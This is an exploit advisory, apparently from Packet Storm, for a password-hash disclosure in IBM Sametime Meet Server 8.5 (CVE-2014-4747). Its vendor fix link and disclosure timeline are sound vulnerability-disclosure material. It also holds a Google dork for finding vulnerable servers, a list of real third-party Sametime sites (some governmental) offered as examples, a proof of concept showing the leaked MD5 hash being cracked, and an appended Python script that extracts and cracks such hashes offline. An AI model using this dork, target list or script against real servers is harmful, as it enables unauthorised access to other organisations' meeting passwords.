IBM Sametime Meet Server 8.5 Password Disclosure

2014-08-11 00:00:00
Adriano Marcio Monteiro
packetstormsecurity.com

EPSS

0.001

Percentile

20.0%

`# Exploit Title: IBM Sametime Meet Server 8.5 Password Disclosure  
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"  
# Date: 11/08/2014  
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N  
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747  
# OSVDB-ID: http://osvdb.org/109443  
#  
# Author: Adriano Marcio Monteiro  
# E-mail: [email protected]  
# Blog: http://www.brazucasecurity.com.br  
#   
# Vendor: http://www.ibm.com  
# Software: http://www.ibm.com/sametime  
# Version: 8.5.1  
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221  
#   
# Test Type: Black Box  
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 / Internet Explorer 10 / Google Chrome Version 33.0.1750.146 m  
  
  
  
Table of Contents  
  
[0x00] The Vulnerability  
[0x01] Exploit Description  
[0x02] PoC - Proof of Concept  
[0x03] Correction or Workaround  
[0x04] Timeline  
[0x05] Published  
[0x06] References  
[0x07] Bibliography  
  
  
  
[0x00] The Vulnerability  
  
Password Disclosure  
Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.  
  
  
  
[0x01] Exploit Description  
  
On the page that allows editing a meeting, the MD5 hash of the meeting password can be retrieved simply by reading the HTML source of the page: the server pre-fills the password fields with the stored hash.  
  
  
  
[0x02] PoC - Proof of Concept  
  
To exploit this vulnerability you only need to view the source of the meeting edit page and read the value attribute of the password fields.  
  
http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536  
  
[...]  
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">  
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">  
[...]  
  
http://www.md5online.org  
E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA  
  
Examples:  
  
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm  
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm  
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm  
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm  
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform  
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform  
http://comware.net/stconf.nsf/frmConference?Openform  
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm  
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform  
https://mail.dba.uz/stconf.nsf/frmConference?Openform  
  
  
  
[0x03] Correction or Workaround  
  
Apply the procedure described at the following link:  
http://www-01.ibm.com/support/docview.wss?uid=swg21679454  
  
  
  
[0x04] Timeline  
  
18/07/2014 - Vulnerability discovered  
19/07/2014 - Vulnerability reported to IBM PSIRT Team  
23/07/2014 - Advisory and troubleshooting fix published  
  
  
  
[0x05] Published  
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747  
http://www.securityfocus.com/bid/68823  
  
  
  
[0x06] References  
  
Information Leakage  
https://www.owasp.org/index.php/Information_Leakage  
  
CWE-200: Information Exposure  
http://cwe.mitre.org/data/definitions/200.html  
  
  
  
[0x07] Bibliography  
  
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent  
  
  
  
[end]  
`
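The PoC in section [0x02] is a manual step: view the page source, copy the 32-hex value out of the password fields, and paste it into an online MD5 lookup. The following script is an added example, not part of the original advisory or of IBM's code, that does the same thing offline: it parses the HTML shown in the PoC for `<input type="password">` fields whose value is a parenthesised MD5 digest and runs a local dictionary lookup, so the leaked hash never leaves the tester's machine. The page is passed in as a string, the `Meet1ng!` password, the small wordlist and the second, constructed HTML snippet are assumptions for demonstration; the first snippet is the one quoted in the advisory.

```python
"""Added example (not part of the original advisory): extract the leaked
meeting-password hash from a Sametime meeting edit page and look it up
in a local wordlist instead of a third-party MD5 lookup site."""
import hashlib
import re
from html.parser import HTMLParser


class PasswordFieldParser(HTMLParser):
    """Collect the value attribute of every <input type="password">."""

    def __init__(self):
        super().__init__()
        self.values = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "password" and a.get("value"):
            # Key by name, falling back to id; a pre-filled value is the leak.
            self.values[a.get("name") or a.get("id") or "?"] = a["value"]


# Sametime renders the digest wrapped in parentheses, e.g. "(E1FA...86B7)".
HEX32 = re.compile(r"^\(?([0-9a-fA-F]{32})\)?$")


def leaked_hashes(html):
    """Return {field_name: lowercase_md5} for password fields pre-filled
    with a 32-hex digest. Empty or non-hex values are ignored."""
    p = PasswordFieldParser()
    p.feed(html)
    out = {}
    for name, value in p.values.items():
        m = HEX32.match(value.strip())
        if m:
            out[name] = m.group(1).lower()
    return out


def crack_md5(digest, wordlist):
    """Offline dictionary lookup: the word whose MD5 equals digest, else None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def check_page(html, wordlist):
    """(field, hash, cracked_word_or_None) for every leaked password field."""
    return [(f, h, crack_md5(h, wordlist)) for f, h in leaked_hashes(html).items()]


# The two input tags exactly as quoted in the advisory's PoC.
ADVISORY_SNIPPET = '''
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
'''

# Constructed page (assumption): a password of our choosing, rendered the
# same way, with an empty confirm field to show those are skipped.
CONSTRUCTED_PASSWORD = "Meet1ng!"
CONSTRUCTED_DIGEST = hashlib.md5(CONSTRUCTED_PASSWORD.encode()).hexdigest()
CONSTRUCTED_SNIPPET = (
    '<form><input type="text" name="Subject" value="Weekly sync">'
    f'<input type="password" value="({CONSTRUCTED_DIGEST.upper()})" name="Password" id="pw">'
    '<input type="password" value="" name="ConfirmPassword" id="rpw"></form>'
)

# Tiny constructed wordlist standing in for a real one such as rockyou.txt.
WORDLIST = ["password", "123456", "AAA", "sametime", CONSTRUCTED_PASSWORD]


if __name__ == "__main__":
    for label, page in (("advisory", ADVISORY_SNIPPET), ("constructed", CONSTRUCTED_SNIPPET)):
        for field, digest, word in check_page(page, WORDLIST):
            print(f"[{label}] {field}: {digest} -> {word or 'not in wordlist'}")
```

In a real assessment the HTML would come from an authenticated GET of the `?editdocument` URL shown in the PoC; any non-empty value in a password field there is already the finding, whether or not the dictionary step succeeds, because the server should never echo a stored credential or its hash back into a form.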